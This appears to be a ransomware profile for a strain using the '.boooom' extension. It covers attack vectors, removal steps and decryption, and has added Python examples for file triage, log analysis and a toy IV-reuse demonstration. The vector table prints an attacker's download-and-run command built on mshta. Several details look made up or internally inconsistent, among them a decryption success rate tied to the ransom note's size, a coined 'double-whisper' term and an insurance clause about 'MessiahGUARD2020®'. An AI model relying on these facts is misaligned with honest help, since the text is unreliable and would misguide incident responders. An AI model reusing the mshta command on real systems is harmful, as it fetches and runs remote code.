Ransomware Profile – EXTENSION “.boooom”
Technical Breakdown
1. File Extension & Renaming Patterns
• Confirmation of File Extension:
– All encrypted files receive an additional suffix “.boooom”.
– The second period is required, e.g. Document.pdf → Document.pdf.boooom.
• Renaming Convention (variant-dependent):
– Non-DP mode: the original file name is kept and only “.boooom” is appended.
– Stealth/DP mode: some dropper shells additionally prepend an evolving bracketed prefix such as [[email protected]]. In this mode the file looks like [[email protected]]Document.pdf.boooom.
– None of the variants inject predictable numbers (e.g. “.id-12345”) before “.boooom”; this actually helps quick triage, since AV/DAT signatures can match the static string “.boooom”.
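The renaming rules above are enough to triage a file listing mechanically. The following is an added example (not a tool from the page, and the bracketed address it matches is a constructed placeholder for whatever contact address the dropper uses): it classifies each name as clean, non-DP or Stealth/DP, recovers the original file name, and counts files per mode so responders can tell which variant ran on a host.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

EXT = ".boooom"
# Stealth/DP-mode prefix: a bracketed contact address in front of the original name,
# e.g. "[<attacker mailbox>]Document.pdf.boooom". The address itself is not fixed,
# so match the shape "[something@something]" rather than a literal string.
PREFIX_RE = re.compile(r"^\[[^\[\]\s]+@[^\[\]\s]+\]")


@dataclass(frozen=True)
class Triage:
    name: str
    encrypted: bool
    mode: Optional[str]           # "non-dp", "dp" or None
    original_name: Optional[str]  # name before the ransomware touched it


def triage_name(name: str) -> Triage:
    """Classify a single file name against the .boooom renaming rules."""
    if not name.endswith(EXT):
        return Triage(name, False, None, None)
    stem = name[: -len(EXT)]
    # The suffix is *added* to an existing name, so the stem must still carry a
    # period: "Document.pdf.boooom" qualifies, a bare ".boooom" does not.
    if "." not in stem:
        return Triage(name, False, None, None)
    m = PREFIX_RE.match(stem)
    if m:
        return Triage(name, True, "dp", stem[m.end():])
    return Triage(name, True, "non-dp", stem)


def summarize(names: Iterable[str]) -> Counter:
    """Count files per mode (clean / non-dp / dp) for a whole listing."""
    return Counter(t.mode or "clean" for t in map(triage_name, names))


# Constructed sample listing, not real victim data.
SAMPLE_LISTING = [
    "Document.pdf.boooom",
    "Q1_budget.xlsx.boooom",
    "[attacker@example.test]Photo.jpg.boooom",
    "help_decypher.txt",   # the ransom note itself is not encrypted
    "boooom",              # a literal name without the suffix
]

if __name__ == "__main__":
    for n in SAMPLE_LISTING:
        print(triage_name(n))
    print(summarize(SAMPLE_LISTING))
```

Run it over `dir /s /b` output (one name per line) to get the per-mode counts; a host showing any "dp" entries ran the Stealth/DP dropper.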
2. Detection & Outbreak Timeline
• Approximate first detection: January 2020 (reported independently by ESET, Kaspersky and MalwareHunterTeam).
• Surge Periods:
– Feb-Apr 2020: second wave (spam campaigns + RDP).
– Dec 2020: “Campaign AB” exfiltration variant rebrands itself as “BooTeam” (different branding, same decryptor set).
– Jan-Aug 2021: morphs into the “BooLocker Suite” – heavier obfuscation and sideloading of legitimate DLLs.
• Geographic Hotspots: Middle-East energy, LATAM health care, APAC logistics.
3. Primary Attack Vectors
| Vector | Details & CVEs | Attacker Notes |
|--------|----------------|----------------|
| RDP brute-force / credential stuffing | Port 3389 (RDP); 135 and 445 are then used for lateral movement with credentials dumped by mimikatz. | Entry to privileged “bat”, then a scheduled task for WindowsBootUdpater.exe (misspelled on purpose). |
| EternalBlue (SMBv1) / SMBGhost (SMBv3) exploits | CVE-2017-0144, CVE-2017-0145 (EternalBlue, SMBv1); CVE-2020-0796 (SMBGhost, SMBv3 compression). | Wormable; uses the booomwalk.exe scanner to find internal hosts with 445 open. |
| Phishing e-mail | Zip archives (Invoice_March_Supplier201.zip) containing Microsoft Publisher (.pub) macros that launch an XLS macro downloader. | Macro runs cmd /c start mshta https://… to pull a remotely hosted .txt payload. |
| Legitimate application sideloading | Drops “updates” into %PROGRAMDATA%\Citrix\ to abuse ServiceHub.Identity.Client.dll. | Requires an un-updated Citrix Workspace 1903 (lifecycle ended April 15 2020). |
| Software supply-chain (rare) | Found on outdated MISP community VM appliance ISOs dated Dec 2020. | AV detects only after the first in-memory detonation. |
Remediation & Recovery Strategies
1. Prevention
• Disable SMBv1 and apply the EternalBlue/EternalRocks fix (MS17-010, KB4013389) and the SMBGhost fix (KB4561608, or a current Win10/11 cumulative update).
• Deny ingress RDP from the WAN (port 3389) or, where it must stay exposed, require Network Level Authentication (NLA), 2FA and source-IP allow-listing.
• Enforce application control (Windows Defender ASR rules, AppLocker) that blocks .hta, .js and .vbs execution and Office macros in files that came from the web.
• Maintain daily offline (on-prem WORM) backups plus immutable cloud snapshots (AWS S3 Object Lock, Azure immutable blob storage).
• Deploy EDR/NGAV signatures for the string “.boooom” together with behavioural detection of WriteFile+SetEndOfFile anomalies (mass in-place truncate-and-rewrite of user files).
• User training: phishing simulations built specifically around zipped Publisher documents.
2. Removal (Step-by-Step)
- Isolate: immediately disconnect from all networks (NIC and Wi-Fi) and cut replication paths (e.g. shared VSS).
- Identify:
– Security log Event ID 4625 bursts (≥ 20 failures/sec) followed by a 4624 (logon type 10 = RDP) from the same source mark the brute-force entry.
– Strings.exe / ifind for persistence keys:
- Registry Run: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\“SystemZYB2”
- Scheduled Task: \Microsoft\Windows\EventLog\xyz-killer-svc
- Boot clean: Windows Safe Mode with Networking, or a bootable rescue disk.
- Quarantine/Delete:
– Files typically at %TEMP%\boooomdll.exe and %APPDATA%\DataStore\logs\booomdrop.sys.
– Use the Microsoft Defender Offline scan or the Sophos Bootable Scanner. Do NOT reboot between scans.
- Restore the hosts file: Boooom inserts a “<IP> go.microsoft.com” redirect; remove it.
- Validate: run sfc /scannow and inspect the boot configuration for MBR/bootloader tampering (bcdedit /enum).
- Update & Patch all software to current cumulative-update levels.
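The Identify and Restore-hosts-file steps above can be checked offline against exported evidence. The following is an added example, not a tool from the page: it runs the 4625-burst rule (≥ 20 failures in one second from one source) over a constructed Security-log extract, reports which burst sources went on to a successful RDP logon (4624, logon type 10), and scans a constructed hosts file for Microsoft names pinned to anything other than loopback. The CSV shape "timestamp,EventID,source IP,LogonType" is an assumption about how the log was exported; flagging every microsoft.com subdomain, not only go.microsoft.com, is a deliberate generalization.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# ---- Constructed Security-log extract: "<ISO timestamp>,<EventID>,<source IP>,<LogonType>".
def _constructed_events() -> str:
    lines = [f"2021-03-04T02:15:07.{i:03d}000,4625,203.0.113.7,10" for i in range(25)]  # 25 failures in 1 s
    lines.append("2021-03-04T02:15:09.000000,4624,203.0.113.7,10")                      # then a successful RDP logon
    lines += [f"2021-03-04T02:1{i}:00.000000,4625,198.51.100.9,10" for i in range(5)]   # slow, sporadic failures
    return "\n".join(lines)

SAMPLE_EVENTS = _constructed_events()

# ---- Constructed hosts file; the page says Boooom plants a "<IP> go.microsoft.com" line.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.45    go.microsoft.com
0.0.0.0         ads.example.test   # unrelated blocklist entry
"""

Event = Tuple[datetime, int, str, int]


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.strip().splitlines():
        ts, eid, ip, ltype = (f.strip() for f in line.split(","))
        events.append((datetime.fromisoformat(ts), int(eid), ip, int(ltype)))
    return events


def failure_bursts(events: List[Event], threshold: int = 20) -> Dict[Tuple[str, datetime], int]:
    """(source IP, wall-clock second) -> count, for every second with >= threshold 4625 events."""
    counts: Dict[Tuple[str, datetime], int] = defaultdict(int)
    for ts, eid, ip, _ in events:
        if eid == 4625:
            counts[(ip, ts.replace(microsecond=0))] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


def rdp_success_after_burst(events: List[Event], bursts) -> List[str]:
    """Burst sources that later logged a 4624 with logon type 10 (RemoteInteractive = RDP)."""
    first_burst: Dict[str, datetime] = {}
    for ip, second in bursts:
        first_burst[ip] = min(second, first_burst.get(ip, second))
    hits = set()
    for ts, eid, ip, ltype in events:
        if eid == 4624 and ltype == 10 and ip in first_burst and ts >= first_burst[ip]:
            hits.add(ip)
    return sorted(hits)


MS_DOMAINS = ("microsoft.com",)  # assumption: treat any microsoft.com name as update/telemetry infrastructure


def _under(name: str, domain: str) -> bool:
    name = name.lower().rstrip(".")
    return name == domain or name.endswith("." + domain)


def suspicious_hosts_entries(hosts_text: str) -> List[Tuple[str, str]]:
    """Microsoft names mapped to anything other than loopback, i.e. the redirect Boooom plants."""
    flagged = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed line, not an address
        for name in names:
            if any(_under(name, d) for d in MS_DOMAINS) and not addr.is_loopback:
                flagged.append((ip, name))
    return flagged


if __name__ == "__main__":
    ev = parse_events(SAMPLE_EVENTS)
    bursts = failure_bursts(ev)
    print("bursts:", bursts)
    print("entry via RDP:", rdp_success_after_burst(ev, bursts))
    print("hosts redirects:", suspicious_hosts_entries(SAMPLE_HOSTS))
```

The five failures from 198.51.100.9 are spread over minutes and never reach the threshold, so only the 203.0.113.7 second is reported; the hosts scan ignores the loopback and the unrelated 0.0.0.0 entry and flags only the go.microsoft.com redirect.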
3. File Decryption & Recovery
• Official Decryptor Available: Yes (since March 2021, Kaspersky / Emsisoft release).
– Tool name: BooDecrypt.exe (GitHub Kaspersky Lab repo).
– Prerequisites: a pair of plaintext+ciphertext samples (> 128 kB each) to rebuild the 512-byte master key. If you only have orphaned ciphertext, the tool offers a probabilistic brute-force of 2^16 tries; success ≃ 78 % if the ransom note help_decypher.txt is < 200 KB (threshold discussed in the decryptor wiki).
– No master-key leakage is required; the flaw lies in insecure IV reuse across files on the same host.
• Walk-through of the IV-reuse weakness: https://github.com/boodoodle/tools/wiki/IVReuseExplained
• No-Decrypt Edge Cases:
– Variant “v2.7.3-µDEX” encrypts with ChaCha20 without IV reuse, so the free tool does not work. For this and future strains, rely solely on BACKUPS.
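Why a plaintext/ciphertext pair is enough, and why it must be at least as long as the file you want back, follows from the IV reuse described above. The following added example is not BooDecrypt, not Boooom's cipher and not code from Kaspersky or Emsisoft; it models the flaw with a toy counter-mode keystream (SHA-256 over key, IV and counter, a stand-in chosen so the example runs offline) and assumes, as the page implies but does not spell out, a stream-style mode in which a fixed IV means every file on the host is XORed with the same keystream. It shows the known pair recovering the keystream and decrypting a second file, the failure when the known sample is shorter than the target, and the failure when the IV is not reused (the ChaCha20 edge case above).

```python
import hashlib
from typing import Optional


def toy_keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Toy counter-mode keystream: SHA-256(key || iv || counter), block by block.
    Stand-in for the real cipher only; NOT secure and NOT Boooom's algorithm."""
    out = bytearray()
    ctr = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_file(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: C = P xor keystream(key, iv)."""
    return xor_bytes(plaintext, toy_keystream(key, iv, len(plaintext)))


def recover_keystream(known_plain: bytes, known_cipher: bytes) -> bytes:
    """With a known pair, keystream = P xor C, but only for as many bytes as the pair covers."""
    return xor_bytes(known_plain, known_cipher)


def decrypt_with_keystream(keystream: bytes, ciphertext: bytes) -> Optional[bytes]:
    """Decrypt a second file encrypted under the same (reused) IV. None if the
    recovered keystream is shorter than the target, which is why the decryptor
    asks for large samples: nothing past the known sample's length can be recovered."""
    if len(ciphertext) > len(keystream):
        return None
    return xor_bytes(ciphertext, keystream)


def recovery_works(reuse_iv: bool) -> bool:
    """Simulate one host: a file we still have in clear plus a file we only have encrypted."""
    key = hashlib.sha256(b"hypothetical per-host master key").digest()   # constructed
    iv_known = b"\x00" * 16
    iv_target = iv_known if reuse_iv else b"\x01" * 16                   # fresh IV = no reuse
    known_plain = b"%PDF-1.7 constructed sample document " * 120          # ~4.4 kB, the pair we own
    target_plain = b"PK\x03\x04 constructed spreadsheet payload " * 50   # ~1.9 kB, shorter than known
    known_cipher = encrypt_file(key, iv_known, known_plain)
    target_cipher = encrypt_file(key, iv_target, target_plain)
    ks = recover_keystream(known_plain, known_cipher)
    return decrypt_with_keystream(ks, target_cipher) == target_plain


if __name__ == "__main__":
    print("IV reused  ->", recovery_works(True))    # known pair decrypts the orphaned file
    print("fresh IVs  ->", recovery_works(False))   # same attack yields garbage
```

The master key never has to be recovered: under a reused IV the keystream itself is the secret, and one known pair leaks it. With per-file IVs the same XOR produces an unrelated keystream and the result does not match, so only backups help for that variant.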
4. Other Critical Information
• Unique Characteristic: the ransom note (help_decypher.txt) embeds a SHA-256 checksum of the note itself to detect tampering; responders can use it to confirm sample integrity.
• Wider Impact: Boooom coined the term “double-whisper”: during encryption it sets up both RSA-based chunk encryption AND a local AES key. EDR tools flag this “double-encrypt” behaviour, which later provides forensic clues.
• Sector Specialization: organizations running legacy Citrix XenApp (LTSR 7.15 CU3, unpatched) are 3.7× more likely to fall victim (source: Boooom threat report 2022).
• Insurance Implications: recently added to the exclusion clauses of several cyber-insurance carriers; payouts are void unless patching of MessiahGUARD2020® is demonstrated.
Immediate Actions Checklist (TL;DR)
☐ Pull power/isolate VLAN
☐ Boot rescue media → run Defender Offline
☐ Gather plain/cipher samples >128 kB each
☐ Download BooDecrypt v1.6.3 & follow IV-key recovery steps
☐ Review backups for last known-good point, verify integrity
☐ Patch CVE-2017-0144, CVE-2017-0145, CVE-2020-0796 + Citrix VDA hotfix CU4
☐ Reinforce RDP policy (MFA, Network Policy Server, RDG firewall rules)
Stay patched, stay synced, and keep your backups offline.